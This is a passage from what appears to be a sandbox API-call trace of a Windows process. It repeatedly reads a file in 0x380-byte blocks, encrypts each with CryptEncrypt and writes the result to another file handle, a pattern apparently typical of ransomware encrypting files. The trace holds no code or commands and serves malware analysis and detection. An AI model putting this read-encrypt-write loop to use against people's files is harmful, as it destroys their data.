CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.829] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.829] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.829] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.829] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.829] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.829] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.829] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.829] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.830] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.830] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.830] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.830] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.830] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.830] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.830] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.830] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.830] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.830] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.830] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.830] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.830] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.830] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.831] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.831] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.831] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.831] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.831] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.831] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.831] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.831] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.831] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.831] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.831] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.831] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.831] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.831] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.832] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.832] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.832] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.832] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.832] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.832] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.832] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.832] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.832] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.832] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.832] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.832] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.832] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.833] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.833] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.833] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.833] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.833] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.833] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.833] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.833] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.833] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.833] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.833] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.833] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.833] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.834] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.834] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.834] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.834] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.834] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.834] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.834] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.834] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.834] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.834] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.834] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.834] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.834] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.834] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.835] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.835] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.835] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.835] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.835] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.835] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.835] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.835] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.835] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.835] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.835] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.835] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.835] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.836] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.836] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.836] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.836] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.836] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.836] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.836] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.836] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.836] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.836] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.836] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.836] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.836] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.836] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 